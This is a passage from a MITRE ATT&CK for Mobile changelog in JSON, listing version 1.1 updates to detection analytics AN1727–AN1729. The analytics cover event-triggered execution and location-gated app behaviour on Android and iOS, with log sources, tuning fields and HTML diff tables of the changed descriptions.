class=\"diff_add\">&nbsp;execution&nbsp;context,&nbsp;and&nbsp;supervised&nbsp;device&nbsp;policy&nbsp;state.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--0d22c60c-fd0b-47f8-abe4-2d661a73c653",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 21:01:31.075000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0647#AN1727",
                            "external_id": "AN1727"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1727",
                    "description": "The defender correlates application registration for system event triggers (e.g., broadcast receivers, WorkManager, JobScheduler, SMS/BOOT events) with subsequent execution of application code immediately following the triggering event, without direct user interaction. Confidence increases when execution occurs in background or locked state, is tied to sensitive triggers (SMS received, boot completed, connectivity change), and produces follow-on file or network activity inconsistent with the application\u2019s expected role.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "System event occurs (e.g., SMS received, device boot completed, network state changed) acting as trigger event for execution phase"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between event trigger occurrence and execution behavior"
                        },
                        {
                            "field": "SensitiveEventList",
                            "description": "List of high-risk trigger events such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE, PACKAGE_ADDED"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Applications legitimately expected to use background scheduling or event-driven execution (e.g., messaging, system services)"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether execution should only occur during active user interaction for specific app categories"
                        },
                        {
                            "field": "ExecutionDelayThreshold",
                            "description": "Maximum allowed delay between event trigger and execution to still be considered causal"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound data volume after event-triggered execution to indicate meaningful activity"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between event trigger occurrence and execution behavior\"}, {\"field\": \"SensitiveEventList\", \"description\": \"List of high-risk trigger events such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE, PACKAGE_ADDED\"}, {\"field\": \"AllowedAppList\", \"description\": \"Applications legitimately expected to use background scheduling or event-driven execution (e.g., messaging, system services)\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether execution should only occur during active user interaction for specific app categories\"}, {\"field\": \"ExecutionDelayThreshold\", \"description\": \"Maximum allowed delay between event trigger and execution to still be considered causal\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound data volume after event-triggered execution to indicate meaningful activity\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 21:01:31.075000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates application registration for system event triggers (e.g., broadcast receivers, WorkManager, JobScheduler, SMS/BOOT events) with subsequent execution of application code immediately following the triggering event, without direct user interaction. Confidence increases when execution occurs in background or locked state, is tied to sensitive triggers (SMS received, boot completed, connectivity change), and produces follow-on file or network activity inconsistent with the application\\u2019s expected role.\", \"old_value\": \"Application vetting services can detect which broadcast intents an application registers for and which permissions it requests. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"System event occurs (e.g., SMS received, device boot completed, network state changed) acting as trigger event for execution phase\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to203__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to203__0\"><a href=\"#difflib_chg_to203__top\">t</a></td><td class=\"diff_header\" id=\"from203_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;which&nbsp;broadcast&nbsp;inte</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to203__top\">t</a></td><td class=\"diff_header\" id=\"to203_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;application&nbsp;registration&nbsp;for&nbsp;system&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nts&nbsp;an&nbsp;application&nbsp;registers&nbsp;for&nbsp;and&nbsp;which&nbsp;permissions&nbsp;it&nbsp;re</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">event&nbsp;triggers&nbsp;(e.g.,&nbsp;broadcast&nbsp;receivers,&nbsp;WorkManager,&nbsp;JobS</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">quests.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cheduler,&nbsp;SMS/BOOT&nbsp;events)&nbsp;with&nbsp;subsequent&nbsp;execution&nbsp;of&nbsp;appl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ication&nbsp;code&nbsp;immediately&nbsp;following&nbsp;the&nbsp;triggering&nbsp;event,&nbsp;wit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hout&nbsp;direct&nbsp;user&nbsp;interaction.&nbsp;Confidence&nbsp;increases&nbsp;when&nbsp;exec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ution&nbsp;occurs&nbsp;in&nbsp;background&nbsp;or&nbsp;locked&nbsp;state,&nbsp;is&nbsp;tied&nbsp;to&nbsp;sensi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tive&nbsp;triggers&nbsp;(SMS&nbsp;received,&nbsp;boot&nbsp;completed,&nbsp;connectivity&nbsp;ch</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ange),&nbsp;and&nbsp;produces&nbsp;follow-on&nbsp;file&nbsp;or&nbsp;network&nbsp;activity&nbsp;incon</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sistent&nbsp;with&nbsp;the&nbsp;application\u2019s&nbsp;expected&nbsp;role.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9b4be141-9743-4113-a5f6-2d1a019b0eeb",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 19:15:22.491000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0648#AN1728",
                            "external_id": "AN1728"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1728",
                    "description": "Correlates (1) acquisition of foreground or background location permission sufficient for continuous geolocation evaluation, (2) repeated location checks or registration of geofence monitoring in background or low-interaction states, and (3) transition into sensitive behavior only after the device enters, exits, or remains within a qualifying geographic region. The defender observes a causal chain where an application suppresses malicious or higher-risk behavior until a location-derived condition is satisfied, then initiates follow-on actions such as network communication, background processing, or protected resource access.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "application remains dormant, low-activity, or background-resident across non-qualifying locations and transitions into active execution only after geographic condition is met"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application granted ACCESS_FINE_LOCATION and, when required for background operation, ACCESS_BACKGROUND_LOCATION + capability state sufficient for persistent geolocation monitoring before later guarded activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between location evaluation, region transition, and guarded execution"
                        },
                        {
                            "field": "RegionMatchThreshold",
                            "description": "Defines proximity, radius, or duration within region required before subsequent activity is considered geographically gated"
                        },
                        {
                            "field": "BackgroundLocationRequired",
                            "description": "Whether suspiciousness increases when background location permission is present and activity occurs outside foreground use"
                        },
                        {
                            "field": "DormancyThreshold",
                            "description": "Amount of low-activity or dormant runtime before location-qualified activation"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Baseline of legitimate apps expected to use geofencing or conditional location-based features"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether execution should be considered higher fidelity only when it begins from background or without recent user interaction"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound traffic volume used to distinguish meaningful post-match activity from benign telemetry"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between location evaluation, region transition, and guarded execution\"}, {\"field\": \"RegionMatchThreshold\", \"description\": \"Defines proximity, radius, or duration within region required before subsequent activity is considered geographically gated\"}, {\"field\": \"BackgroundLocationRequired\", \"description\": \"Whether suspiciousness increases when background location permission is present and activity occurs outside foreground use\"}, {\"field\": \"DormancyThreshold\", \"description\": \"Amount of low-activity or dormant runtime before location-qualified activation\"}, {\"field\": \"AllowedAppList\", \"description\": \"Baseline of legitimate apps expected to use geofencing or conditional location-based features\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether execution should be considered higher fidelity only when it begins from background or without recent user interaction\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound traffic volume used to distinguish meaningful post-match activity from benign telemetry\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 19:15:22.491000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) acquisition of foreground or background location permission sufficient for continuous geolocation evaluation, (2) repeated location checks or registration of geofence monitoring in background or low-interaction states, and (3) transition into sensitive behavior only after the device enters, exits, or remains within a qualifying geographic region. The defender observes a causal chain where an application suppresses malicious or higher-risk behavior until a location-derived condition is satisfied, then initiates follow-on actions such as network communication, background processing, or protected resource access.\", \"old_value\": \"Application vetting services can detect unnecessary and potentially abused location permissions.\\nOn Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background.\\nApplication vetting services can detect unnecessary and potentially abused API calls.\\nThe user can review which applications have location permissions in the operating system\\u2019s settings menu.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1 @@\\n-Application vetting services can detect unnecessary and potentially abused location permissions.\\n-On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background.\\n-Application vetting services can detect unnecessary and potentially abused API calls.\\n-The user can review which applications have location permissions in the operating system\\u2019s settings menu.\\n+Correlates (1) acquisition of foreground or background location permission sufficient for continuous geolocation evaluation, (2) repeated location checks or registration of geofence monitoring in background or low-interaction states, and (3) transition into sensitive behavior only after the device enters, exits, or remains within a qualifying geographic region. The defender observes a causal chain where an application suppresses malicious or higher-risk behavior until a location-derived condition is satisfied, then initiates follow-on actions such as network communication, background processing, or protected resource access.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application remains dormant, low-activity, or background-resident across non-qualifying locations and transitions into active execution only after geographic condition is met\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application granted ACCESS_FINE_LOCATION and, when required for background operation, ACCESS_BACKGROUND_LOCATION + capability state sufficient for persistent geolocation monitoring before later guarded activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][2]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to82__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to82__0\"><a href=\"#difflib_chg_to82__top\">t</a></td><td class=\"diff_header\" id=\"from82_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;unnecessary&nbsp;and&nbsp;pote</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to82__top\">t</a></td><td class=\"diff_header\" id=\"to82_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;acquisition&nbsp;of&nbsp;foreground&nbsp;or&nbsp;background&nbsp;locat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ntially&nbsp;abused&nbsp;location&nbsp;permissions.&nbsp;On&nbsp;Android&nbsp;10&nbsp;and&nbsp;later</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;permission&nbsp;sufficient&nbsp;for&nbsp;continuous&nbsp;geolocation&nbsp;evaluat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">,&nbsp;the&nbsp;system&nbsp;shows&nbsp;a&nbsp;notification&nbsp;to&nbsp;the&nbsp;user&nbsp;when&nbsp;an&nbsp;app&nbsp;ha</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion,&nbsp;(2)&nbsp;repeated&nbsp;location&nbsp;checks&nbsp;or&nbsp;registration&nbsp;of&nbsp;geofenc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;been&nbsp;accessing&nbsp;device&nbsp;location&nbsp;in&nbsp;the&nbsp;background.&nbsp;Applicat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;monitoring&nbsp;in&nbsp;background&nbsp;or&nbsp;low-interaction&nbsp;states,&nbsp;and&nbsp;(3</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;unnecessary&nbsp;and&nbsp;potentially&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">)&nbsp;transition&nbsp;into&nbsp;sensitive&nbsp;behavior&nbsp;only&nbsp;after&nbsp;the&nbsp;device&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">abused&nbsp;API&nbsp;calls.&nbsp;The&nbsp;user&nbsp;can&nbsp;review&nbsp;which&nbsp;applications&nbsp;hav</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nters,&nbsp;exits,&nbsp;or&nbsp;remains&nbsp;within&nbsp;a&nbsp;qualifying&nbsp;geographic&nbsp;regi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;location&nbsp;permissions&nbsp;in&nbsp;the&nbsp;operating&nbsp;system\u2019s&nbsp;settings&nbsp;me</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;an&nbsp;applicatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nu.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;suppresses&nbsp;malicious&nbsp;or&nbsp;higher-risk&nbsp;behavior&nbsp;until&nbsp;a&nbsp;locat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion-derived&nbsp;condition&nbsp;is&nbsp;satisfied,&nbsp;then&nbsp;initiates&nbsp;follow-on</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;actions&nbsp;such&nbsp;as&nbsp;network&nbsp;communication,&nbsp;background&nbsp;processin</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">g,&nbsp;or&nbsp;protected&nbsp;resource&nbsp;access.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--2f2ed160-9093-4b1f-b781-8660552bf1e5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 19:20:39.637000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0648#AN1729",
                            "external_id": "AN1729"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1729",
                    "description": "Correlates (1) application possession and use of location authorization sufficient for ongoing geographic evaluation, (2) repeated location or region-monitoring behavior with limited visible feature activation outside target area, and (3) abrupt onset of network communication, background execution, or feature activation only after a qualifying location context is reached. Because direct visibility into every geofence callback is often weaker on iOS, the defender relies more heavily on the combination of location authorization state, repeated location access, app state transition, and downstream behavior that begins after region alignment.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "application authorized for when-in-use or always location access and, where relevant, background execution capability sufficient for continued geographic evaluation before later guarded behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between location access, region qualification, and guarded activity"
                        },
                        {
                            "field": "AuthorizationMode",
                            "description": "Expected risk weighting for when-in-use versus always authorization and whether background behavior occurs under that mode"
                        },
                        {
                            "field": "RegionMatchThreshold",
                            "description": "Defines geospatial or dwell-time threshold used to infer region-based activation"
                        },
                        {
                            "field": "DormancyThreshold",
                            "description": "Duration of inactivity or suppressed behavior before location-qualified activation"
                        },
                        {
                            "field": "ExpectedBackgroundModes",
                            "description": "Baseline of apps legitimately using location-driven background execution or region monitoring"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Expected destinations for apps whose network activity legitimately depends on user location"
                        },
                        {
                            "field": "UserInteractionThreshold",
                            "description": "Acceptable recency of user interaction before post-location activation is considered suspicious"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between location access, region qualification, and guarded activity\"}, {\"field\": \"AuthorizationMode\", \"description\": \"Expected risk weighting for when-in-use versus always authorization and whether background behavior occurs under that mode\"}, {\"field\": \"RegionMatchThreshold\", \"description\": \"Defines geospatial or dwell-time threshold used to infer region-based activation\"}, {\"field\": \"DormancyThreshold\", \"description\": \"Duration of inactivity or suppressed behavior before location-qualified activation\"}, {\"field\": \"ExpectedBackgroundModes\", \"description\": \"Baseline of apps legitimately using location-driven background execution or region monitoring\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Expected destinations for apps whose network activity legitimately depends on user location\"}, {\"field\": \"UserInteractionThreshold\", \"description\": \"Acceptable recency of user interaction before post-location activation is considered suspicious\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 19:20:39.637000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) application possession and use of location authorization sufficient for ongoing geographic evaluation, (2) repeated location or region-monitoring behavior with limited visible feature activation outside target area, and (3) abrupt onset of network communication, background execution, or feature activation only after a qualifying location context is reached. Because direct visibility into every geofence callback is often weaker on iOS, the defender relies more heavily on the combination of location authorization state, repeated location access, app state transition, and downstream behavior that begins after region alignment.\", \"old_value\": \"Application vetting services can detect unnecessary and potentially abused location permissions.\\nOn Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background.\\nApplication vetting services can detect unnecessary and potentially abused API calls.\\nThe user can review which applications have location permissions in the operating system\\u2019s settings menu.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1 @@\\n-Application vetting services can detect unnecessary and potentially abused location permissions.\\n-On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background.\\n-Application vetting services can detect unnecessary and potentially abused API calls.\\n-The user can review which applications have location permissions in the operating system\\u2019s settings menu.\\n+Correlates (1) application possession and use of location authorization sufficient for ongoing geographic evaluation, (2) repeated location or region-monitoring behavior with limited visible feature activation outside target area, and (3) abrupt onset of network communication, background execution, or feature activation only after a qualifying location context is reached. Because direct visibility into every geofence callback is often weaker on iOS, the defender relies more heavily on the combination of location authorization state, repeated location access, app state transition, and downstream behavior that begins after region alignment.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"application authorized for when-in-use or always location access and, where relevant, background execution capability sufficient for continued geographic evaluation before later guarded behavior\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}",
